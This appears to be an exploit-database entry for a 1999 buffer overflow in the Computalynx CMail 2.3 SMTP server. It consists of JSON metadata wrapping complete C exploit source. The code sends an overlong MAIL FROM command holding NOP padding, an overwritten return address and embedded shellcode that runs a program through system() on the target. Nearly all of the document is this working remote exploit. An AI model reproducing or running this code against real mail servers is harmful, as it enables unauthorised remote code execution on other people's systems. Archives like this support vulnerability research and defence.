Description
Computalynx CMail 2.3 SP22.4 - SMTP Buffer Overflow
{"lastseen": "2020-04-01T19:04:10", "references": [], "description": "\nComputalynx CMail 2.3 SP22.4 - SMTP Buffer Overflow", "edition": 1, "reporter": "UNYUN", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "1999-09-13T00:00:00", "title": "Computalynx CMail 2.3 SP22.4 - SMTP Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.6, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "bulletinFamily": "exploit", "cvelist": [], "modified": "1999-09-13T00:00:00", "id": "EXPLOITPACK:7DC32F047C099E2B9F02872AFDCD5938", "href": "", "viewCount": 3, "sourceData": "// source: https://www.securityfocus.com/bid/633/info\n\nThere is a buffer overflow in the CMail SMTP service (long MAIL FROM:) that may allow an attacker to execute arbitrary code on the target server. \n\nCMail Server\n\n/*=============================================================================\n CMAIL Server 2.3 SP2 Exploit for Windows98\n The Shadow Penguin Security (http://shadowpenguin.backsection.net)\n Written by UNYUN (shadowpenguin@backsection.net)\n =============================================================================\n*/\n#include <stdio.h>\n#include <string.h>\n#include <netdb.h>\n#include <netinet/in.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <sys/time.h>\n#include <unistd.h>\n\n#define BUFSIZE 2000\n#define SMTP_PORT 25\n#define RETADR 626\n#define JMPADR 622\n#define JMPOFS 6\n#define EIP 0xbff7a06b\n#define NOP 0x90\n#define JMPS 0xeb\n\nunsigned char exploit_code[200]={\n0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,\n0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,\n0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,\n0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,\n0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,\n0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,\n0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,\n0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,\n0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,\n0xFF, 0x00};\nunsigned char cmdbuf[200]=\"msvcrt.dll.system.exit.welcome.exe\";\n\nint main(int argc,char *argv[])\n{\n struct hostent *hs;\n struct sockaddr_in cli;\n char packetbuf[BUFSIZE+3000],buf[BUFSIZE];\n int sockfd,i,ip;\n\n if (argc<2){\n printf(\"usage\\n %s HostName\\n\",argv[0]);\n exit(1);\n }\n bzero(&cli, sizeof(cli));\n cli.sin_family = AF_INET;\n cli.sin_port = htons(SMTP_PORT);\n if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){\n if ((hs=gethostbyname(argv[1]))==NULL){\n printf(\"Can not resolve specified host.\\n\");\n exit(1);\n }\n cli.sin_family = hs->h_addrtype;\n memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);\n }\n\n if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){\n perror(\"socket\"); exit(0);\n }\n\n if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){\n perror(\"connect\"); exit(0);\n }\n while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){\n packetbuf[i]=0;\n if(strchr(packetbuf,'\\n')!=NULL) break;\n }\n\n strcat(exploit_code,cmdbuf);\n exploit_code[65]=strlen(cmdbuf+23);\n memset(buf,0x90,BUFSIZE);\n ip=EIP;\n buf[RETADR ]=ip&0xff;\n buf[RETADR+1]=(ip>>8)&0xff;\n buf[RETADR+2]=(ip>>16)&0xff;\n buf[RETADR+3]=(ip>>24)&0xff;\n buf[JMPADR] =JMPS;\n buf[JMPADR+1]=JMPOFS;\n memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));\n buf[BUFSIZE]=0;\n\n sprintf(packetbuf,\"helo penguin\\r\\n\");\n write(sockfd,packetbuf,strlen(packetbuf));\n while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){\n packetbuf[i]=0;\n if(strchr(packetbuf,'\\n')!=NULL) break;\n }\n printf(\"%s\\n\",packetbuf);\n sprintf(packetbuf,\"MAIL FROM: aa <%s@aa.com>\\r\\n\",buf);\n write(sockfd,packetbuf,strlen(packetbuf));\n sleep(100);\n close(sockfd);\n}\n\n-------------------", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645735135}}
{}
Computalynx CMail 2.3 SP22.4 - SMTP Buffer Overflow